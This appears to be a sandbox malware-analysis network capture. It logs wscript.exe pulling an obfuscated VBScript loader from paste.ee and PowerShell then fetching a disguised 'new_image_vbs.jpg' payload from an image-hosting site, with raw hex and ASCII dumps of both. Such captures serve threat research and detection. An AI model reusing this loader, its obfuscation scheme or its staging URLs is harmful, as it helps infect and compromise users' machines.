Apr 17, 2024 08:40:09.941452980 CEST	1277	IN	Data Raw: 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62 66 63 37 38 36 33 63 32 66 31 33 37 38 65 33 38 61 35 33 62 64 32 32 62 37 39 30 63 36 39 63 31 34 31 34 33 62 30 66 39 63 65 34 35 63 61 2e Data Ascii: s/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>rhyme.academy</h1><h2>has expired.</h2><div class='cta'><a class='btn' href='https://www.hover.com/renew/domain/rhyme.academy
Apr 17, 2024 08:40:09.941472054 CEST	1277	IN	Data Raw: 63 6f 6d 2f 65 6d 61 69 6c 3f 73 6f 75 72 63 65 3d 65 78 70 69 72 65 64 22 3e 45 6d 61 69 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 Data Ascii: com/email?source=expired">Email</a></li><li><a rel="nofollow" href="https://www.hover.com/about?source=expired">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=expired">Help</a></li><li><a rel="nofollow" href
Apr 17, 2024 08:40:09.941493034 CEST	1277	IN	Data Raw: 34 33 31 35 39 2c 30 20 2d 33 35 2e 31 38 36 39 36 2c 31 35 2e 37 35 33 36 35 20 2d 33 35 2e 31 38 36 39 36 2c 33 35 2e 31 38 35 32 35 20 30 2c 32 2e 37 35 37 38 31 20 30 2e 33 31 31 32 38 2c 35 2e 34 34 33 35 39 20 30 2e 39 31 31 35 35 2c 38 2e Data Ascii: 43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.2871
Apr 17, 2024 08:40:09.941510916 CEST	1277	IN	Data Raw: 35 30 71 30 20 2d 33 38 20 2d 32 37 20 2d 36 35 74 2d 36 35 20 2d 32 37 74 2d 36 35 20 32 37 74 2d 32 37 20 36 35 74 32 37 20 36 35 74 36 35 20 32 37 74 36 35 20 2d 32 37 74 32 37 20 2d 36 35 7a 4d 37 36 38 20 31 32 37 30 20 71 2d 37 20 30 20 2d Data Ascii: 50q0 -38 -27 -65t-65 -27t-65 27t-27 65t27 65t65 27t65 -27t27 -65zM768 1270 q-7 0 -76.5 0.5t-105.5 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -
Apr 17, 2024 08:40:09.941529036 CEST	228	IN	Data Raw: 73 79 6e 63 3d 31 3b 61 2e 73 72 63 3d 67 3b 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 61 2c 6d 29 0a 20 20 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 2f 2f 77 77 77 Data Ascii: sync=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-4171338-45', 'auto'); ga('send', 'pageview');</script></body></html>0

HTTPS Connections

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 17, 2024 08:39:41.307441950 CEST	173.222.162.64	443	192.168.2.6	49698	CN=r.bing.com, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft Azure ECC TLS Issuing CA 05, O=Microsoft Corporation, C=US	CN=Microsoft Azure ECC TLS Issuing CA 05, O=Microsoft Corporation, C=US CN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Oct 18 22:32:40 CEST 2023 Wed Aug 12 02:00:00 CEST 2020	Fri Jun 28 01:59:59 CEST 2024 Fri Jun 28 01:59:59 CEST 2024	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,0	28a2c9bd18a11de089ef85a160da29e4
Apr 17, 2024 08:39:41.307441950 CEST	173.222.162.64	443	192.168.2.6	49698	CN=Microsoft Azure ECC TLS Issuing CA 05, O=Microsoft Corporation, C=US	CN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=US	Wed Aug 12 02:00:00 CEST 2020	Fri Jun 28 01:59:59 CEST 2024		28a2c9bd18a11de089ef85a160da29e4

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49699	104.21.84.67	443	5492	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 06:39:21 UTC	319	OUT	GET /d/z0DWX HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: paste.ee Connection: Keep-Alive
2024-04-17 06:39:21 UTC	1232	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 06:39:21 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Orvo2d3odUAUNSv8mB00a%2BAVS94bFUaYooJtfrUFu4yM00K4YwADk73g%2FlrM5XtGBOcxvFhomcTTGoHuUSicvdUaIeAq0i8xqUJohskl2kkpK5cHQHzUjGpebg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 875a6ade9e794546-ATL alt-svc: h3=":443"; ma=86400
2024-04-17 06:39:21 UTC	137	IN	Data Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 65 6e 74 72 65 61 63 74 6f 20 2c 20 6f 72 76 61 6c 68 69 6e 68 61 20 2c 20 67 6f 6c 66 61 72 20 2c 20 70 69 65 67 75 69 63 65 20 2c 20 68 79 70 65 72 63 69 6e 65 73 69 61 20 2c 20 43 61 6d 61 20 2c 20 68 79 70 65 72 63 69 6e 65 73 69 61 31 0d 0a 20 20 20 20 20 6f 72 76 61 6c 68 69 6e 68 61 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 67 6f 6c 66 61 72 20 20 3d Data Ascii: 1f7f dim entreacto , orvalhinha , golfar , pieguice , hypercinesia , Cama , hypercinesia1 orvalhinha = " " golfar =
2024-04-17 06:39:21 UTC	1369	IN	Data Raw: 20 22 22 20 26 20 70 69 65 67 75 69 63 65 20 26 20 6f 72 76 61 6c 68 69 6e 68 61 20 26 20 70 69 65 67 75 69 63 65 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 59 51 Data Ascii: "" & pieguice & orvalhinha & pieguice & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQ
2024-04-17 06:39:21 UTC	1369	IN	Data Raw: 67 54 72 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 70 69 65 67 75 69 63 65 20 26 20 6f 72 76 61 6c 68 69 6e 68 61 20 26 20 70 69 65 67 75 69 63 65 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 70 69 65 67 75 69 63 65 20 26 20 6f 72 76 61 6c 68 Data Ascii: gTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & pieguice & orvalhinha & pieguice & "gBvDgTreHIDgTre" & pieguice & orvalh
2024-04-17 06:39:21 UTC	1369	IN	Data Raw: 67 54 72 65 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 70 69 65 67 75 69 63 65 20 26 20 6f 72 76 61 6c 68 69 6e 68 61 20 26 20 70 69 65 67 75 69 63 65 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 70 69 65 67 75 69 63 65 20 26 20 6f 72 76 61 6c 68 69 6e 68 61 20 26 20 70 69 65 67 75 69 63 65 20 26 20 22 51 42 75 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 6a 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 Data Ascii: gTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & pieguice & orvalhinha & pieguice & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & pieguice & orvalhinha & pieguice & "QBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgT
2024-04-17 06:39:21 UTC	1369	IN	Data Raw: 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 47 55 44 67 54 72 65 58 77 42 32 44 67 54 72 65 47 49 44 67 54 72 65 63 77 44 67 54 72 65 75 44 67 54 72 65 47 6f 44 67 54 72 65 63 44 67 54 72 65 42 6e 44 67 54 72 65 44 38 44 67 54 72 65 4d 51 44 67 54 72 65 33 44 67 54 72 65 44 45 44 67 54 72 65 4d 67 44 67 54 72 65 31 44 67 54 72 65 44 67 44 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 31 44 67 54 72 65 44 44 67 54 72 65 44 67 54 72 65 4d 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 61 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 70 69 65 67 75 69 63 65 20 26 20 6f 72 76 61 6c 68 69 6e 68 61 20 26 20 70 69 65 67 75 69 63 65 20 26 20 22 77 42 6c Data Ascii: DgTreG0DgTreYQBnDgTreGUDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMgDgTre1DgTreDgDgTreODgTreDgTre1DgTreDDgTreDgTreMDgTreDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTre" & pieguice & orvalhinha & pieguice & "wBl
2024-04-17 06:39:21 UTC	1369	IN	Data Raw: 65 20 26 20 22 77 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 44 77 44 67 54 72 65 50 44 67 54 72 65 42 43 44 67 54 72 65 45 45 44 67 54 72 65 55 77 42 46 44 67 54 72 65 44 59 44 67 54 72 65 4e 44 67 54 72 65 42 66 44 67 54 72 65 46 4d 44 67 54 72 65 56 44 67 54 72 65 42 42 44 67 54 72 65 46 49 44 67 54 72 65 56 44 67 54 72 65 44 67 54 72 65 2b 44 67 54 72 65 44 34 44 67 54 72 65 4a 77 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 70 69 65 67 75 69 63 65 20 26 20 6f 72 76 61 6c 68 69 6e 68 61 20 26 20 70 69 65 67 75 69 63 65 20 26 20 22 44 67 54 72 65 42 47 44 67 54 72 65 47 77 44 67 54 72 65 59 51 42 6e Data Ascii: e & "wDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTre" & pieguice & orvalhinha & pieguice & "DgTreBGDgTreGwDgTreYQBn
2024-04-17 06:39:21 UTC	1089	IN	Data Raw: 20 26 20 22 51 44 67 54 72 65 67 44 67 54 72 65 44 44 67 54 72 65 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 74 44 67 54 72 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 70 69 65 67 75 69 63 65 20 26 20 6f 72 76 61 6c 68 69 6e 68 61 20 26 20 70 69 65 67 75 69 63 65 20 26 20 22 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 70 69 65 67 75 69 63 65 20 26 20 6f 72 76 61 6c 68 69 6e 68 61 20 26 20 70 69 65 67 75 69 63 65 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 74 44 67 54 72 65 47 63 44 67 54 72 65 64 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 Data Ascii: & "QDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTre" & pieguice & orvalhinha & pieguice & "DgTreBJDgTreG4DgTre" & pieguice & orvalhinha & pieguice & "DgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgT
2024-04-17 06:39:21 UTC	1369	IN	Data Raw: 31 34 38 61 0d 0a 20 26 20 70 69 65 67 75 69 63 65 20 26 20 6f 72 76 61 6c 68 69 6e 68 61 20 26 20 70 69 65 67 75 69 63 65 20 26 20 22 51 42 55 44 67 54 72 65 47 55 44 67 54 72 65 65 44 67 54 72 65 42 30 44 67 54 72 65 43 34 44 67 54 72 65 55 77 42 31 44 67 54 72 65 47 49 44 67 54 72 65 63 77 42 30 44 67 54 72 65 48 49 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 63 44 67 54 72 65 4b 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 4a 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 70 69 65 67 75 69 63 65 20 26 20 6f 72 76 61 6c 68 69 6e 68 61 20 26 20 70 69 65 67 75 69 63 65 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 67 44 67 54 72 65 4c 44 67 54 Data Ascii: 148a & pieguice & orvalhinha & pieguice & "QBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTre" & pieguice & orvalhinha & pieguice & "DgTreBlDgTreHgDgTreLDgT
2024-04-17 06:39:21 UTC	1369	IN	Data Raw: 47 4d 44 67 54 72 65 62 77 42 74 44 67 54 72 65 47 30 44 67 54 72 65 59 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 51 67 42 35 44 67 54 72 65 48 51 44 67 54 72 65 22 20 26 20 70 69 65 67 75 69 63 65 20 26 20 6f 72 76 61 6c 68 69 6e 68 61 20 26 20 70 69 65 67 75 69 63 65 20 26 20 22 51 42 7a 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 64 44 67 54 72 65 42 35 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 22 20 26 20 70 69 65 67 75 69 63 65 20 26 20 6f 72 76 61 6c 68 69 6e 68 61 20 26 20 70 69 65 67 75 69 63 65 20 26 20 22 51 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 Data Ascii: GMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTre" & pieguice & orvalhinha & pieguice & "QBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTre" & pieguice & orvalhinha & pieguice & "QDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTre"
2024-04-17 06:39:21 UTC	1369	IN	Data Raw: 69 63 65 20 26 20 6f 72 76 61 6c 68 69 6e 68 61 20 26 20 70 69 65 67 75 69 63 65 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 4d 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 64 67 42 68 44 67 54 72 65 47 51 44 67 54 72 65 62 77 44 67 54 72 65 6e 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 63 44 67 54 72 65 22 20 26 20 70 69 65 67 75 69 63 65 20 26 20 6f 72 76 61 6c 68 69 6e 68 61 20 26 20 70 69 65 67 75 69 63 65 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 48 4d 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 64 67 42 68 44 67 54 72 65 47 51 44 67 54 72 65 62 77 44 67 54 72 65 6e 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4c 44 67 54 72 65 44 67 54 72 Data Ascii: ice & orvalhinha & pieguice & "DgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTre" & pieguice & orvalhinha & pieguice & "DgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49700	172.67.215.45	443	5804	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 06:39:24 UTC	128	OUT	GET /images/004/766/979/original/new_image_vbs.jpg?1712588500 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-04-17 06:39:24 UTC	699	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 06:39:24 GMT Content-Type: image/jpeg Content-Length: 4201093 Connection: close Last-Modified: Mon, 08 Apr 2024 15:01:40 GMT ETag: "661406d4-401a85" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 1201 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HR8l9G3RWVaG0NCmJhXTqBp6Jx4nZs2Z2Og%2BtpYB%2F%2FyFfH1ITbKbRSgoNtm0BVB4mJPG7iTDd6u6lKlJf7Ivs14fONjE%2FpCsjTOxBsrXQ27cUZGg25ywNdUnmh%2FqL2IcqRUBItxLsMWC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 875a6af4cf0d12dd-ATL alt-svc: h3=":443"; ma=86400
2024-04-17 06:39:24 UTC	670	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-04-17 06:39:24 UTC	1369	IN	Data Raw: c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc Data Ascii: o.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4Ap
2024-04-17 06:39:24 UTC	1369	IN	Data Raw: c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 Data Ascii: VH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h\|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$
2024-04-17 06:39:24 UTC	1369	IN	Data Raw: 2d 5c 6d c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 Data Ascii: -\mTr7qLz2iO7ZsiA%nGR?{O\|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
2024-04-17 06:39:24 UTC	1369	IN	Data Raw: 8b 3e f8 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e Data Ascii: >2HPscb.F$e%zIMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^
